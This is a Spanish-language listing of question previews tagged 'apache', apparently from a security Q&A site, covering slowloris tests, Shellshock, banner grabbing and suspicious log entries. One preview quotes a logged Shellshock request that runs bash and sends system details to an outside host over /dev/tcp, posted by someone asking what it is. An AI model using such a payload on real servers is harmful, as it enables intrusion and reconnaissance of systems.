Preguntas con etiqueta 'apache'

preguntas con etiqueta
1
respuesta

Detectando el ataque de cámara lenta al verificar el registro de Apache

Estoy realizando una simulación de un ataque de cámara lenta en un servidor Debian que ejecuta Apache. Las máquinas atacantes también son Debian. Para asegurarme de que el ataque de slowloris fue efectivo, me gustaría acceder a los registr...
hecha 20.03.2017 - 12:27
2
respuestas

¿Por qué StartTLS bloquea la conexión a Apache?

Cuando ejecuto este comando: openssl s_client -connect my.server:443 -starttls smtp ¿Por qué Apache 2.4 & OpenSSL 1.0.1h (ejecutándose en el servidor 2008R2) ¿deja de responder a la solicitud de otras máquinas? Lo que veo cuando ejec...
hecha 22.07.2015 - 20:11
1
respuesta

Línea de registro de Apache extraño [duplicado]

Acabo de encontrar esta entrada en uno de mis servidores: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.2...
hecha 17.06.2015 - 07:56
2
respuestas

Asegurar los servicios web de Java llamados por el sitio web en DMZ utilizando servicios web para la comunicación

Supongamos que tiene una aplicación que ejecuta servicios web Java en Apache Axis 2. Específicamente, estos son JAX-WS (API de Java para servicios web basados en XML). Actualmente, estos servicios web se encuentran en el mismo servidor Windows S...
hecha 07.03.2013 - 00:35
1
respuesta

NGINX / HTTP TRACE

Tengo un servidor http Nginx con HTTP TRACE Habilitado. Un solo nmap --script=http-methods.nse host.name da este resultado: Not shown: 988 closed ports PORT STATE SERVICE VERSION [...] 80/tcp open http...
hecha 26.09.2012 - 05:02
2
respuestas

Cómo contrarrestar o corregir la vulnerabilidad de captura de banners

Durante una auditoría, me topé con los resultados de la captura de banners y me gustaría saber cómo mitigar eso en IIS y el servidor de apache.     
hecha 01.09.2012 - 12:32
2
respuestas

Aparte de los archivos cargados, ¿de qué otra manera se pueden explotar los permisos 777 en los archivos / carpetas del sitio web?

He visto varias instancias de sitios web de php comprometidos debido a los permisos establecidos en 777 en las carpetas del sitio web. En estos casos, la causa fue un archivo extraño cargado por el atacante. Diga que estoy ejecutando Apache c...
hecha 04.01.2016 - 09:07
1
respuesta

Resultados de exploración de vulnerabilidad inusual en registros de Apache

Recientemente he visto entradas similares a las siguientes en mis registros de acceso de Apache. He reemplazado la dirección IP y el tiempo con Xs: access_log:xx.xx.xx.xx - - [xx/xx/xx:xx:xx:xx -0100] "GET /js/query-ui/js/?a.aspectRatio:this.o...
hecha 10.01.2016 - 22:35
1
respuesta

¿Por qué Shellshock funciona en una cadena de usuario?

Me preguntaba por qué funciona Shellshock cuando se coloca en el agente de usuario. Según lo que pude encontrar, es porque un servidor web (por ejemplo, Apache) utiliza la cadena de usuario en su funcionamiento interno. ¿Por qué a un serv...
hecha 17.11.2014 - 13:49
1
respuesta

¿Se está utilizando mi servidor como proxy o está siendo atacado?

Tengo un proyecto de Ubuntu, Apache, Passenger y Rails 4 en AWS EC2. No estoy familiarizado con la seguridad y el lado del servidor de mi proyecto. Recientemente, mi sitio estaba inactivo debido a "demasiados usuarios", así que cuando revisé...
hecha 02.04.2015 - 13:59